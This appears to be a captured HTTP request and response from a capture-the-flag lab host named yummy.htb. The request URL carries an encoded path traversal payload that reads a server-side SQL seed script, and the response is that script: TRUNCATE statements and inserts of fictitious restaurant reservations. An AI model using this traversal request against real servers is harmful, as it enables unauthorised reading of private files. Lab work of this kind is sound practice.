URL: http://yummy.htb:80/export/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fdata%2Fscripts%2Fsqlappointments.sql
Response:
TRUNCATE table users;
TRUNCATE table appointments;
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("chrisjohnson@email.net", "Chris Johnson", "2024-05-25", "11:45", "2", "No allergies, prefer table by the window", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("laurajohnson@domain.edu", "Laura Johnson", "2024-01-20", "04:15", "3", "Vegan meal required", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("chrisrodriguez@email.net", "Chris Rodriguez", "2024-11-10", "17:00", "6", "Celebrating a birthday, bring a cake", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("laurarodriguez@sample.org", "Laura Rodriguez", "2024-10-25", "02:00", "6", "Wheelchair accessible seating", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("chrisbrown@domain.edu", "Chris Brown", "2024-05-28", "06:15", "5", "Prefer a quiet corner table", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("johnrodriguez@sample.org", "John Rodriguez", "2024-02-17", "11:15", "2", "Gluten-free meal required", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("emilygarcia@example.com", "Emily Garcia", "2024-01-30", "03:00", "3", "High chair needed for a toddler", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("sarahdavis@example.com", "Sarah Davis", "2024-11-17", "14:30", "5", "Celebrating an anniversary, bring flowers", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("alexdavis@sample.org", "Alex Davis", "2024-10-16", "20:45", "6", "Prefer outdoor seating", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("janemiller@domain.edu", "Jane Miller", "2024-09-28", "15:45", "3", "Kosher meal required", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("johnsmith@test.com", "John Smith", "2024-04-17", "00:30", "5", "Halal meal required", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("chrissmith@domain.edu", "Chris Smith", "2024-08-07", "07:30", "5", "Birthday celebration with decorations", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("lauramartinez@test.com", "Laura Martinez", "2024-02-23", "09:30", "1", "Surprise party, please assist with arrangements", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("chrisjones@example.com", "Chris Jones", "2024-04-12", "03:15", "5", "Table near the entrance preferred", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("sarahmiller@domain.edu", "Sarah Miller", "2024-11-25", "18:15", "3", "Quiet section, no music preferred", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("katiejones@email.net", "Katie Jones", "2024-11-30", "01:45", "5", "Celebrating a promotion, special dessert", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("janewilliams@example.com", "Jane Williams", "2024-09-28", "15:15", "5", "Table with a view preferred", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("laurajohnson@email.net", "Laura Johnson", "2024-05-12", "22:45", "5", "Bringing service animal, need space", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("chriswilliams@sample.org", "Chris Williams", "2024-04-11", "15:45", "4", "Table with ample lighting preferred", "customer");
INSERT INTO appointments (appointment_email, appointment_name, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES ("michaelsmith@domain.edu", "Michael Smith", "2024-11-05", "20:45", "2", "Need a socket for laptop charging", "customer");
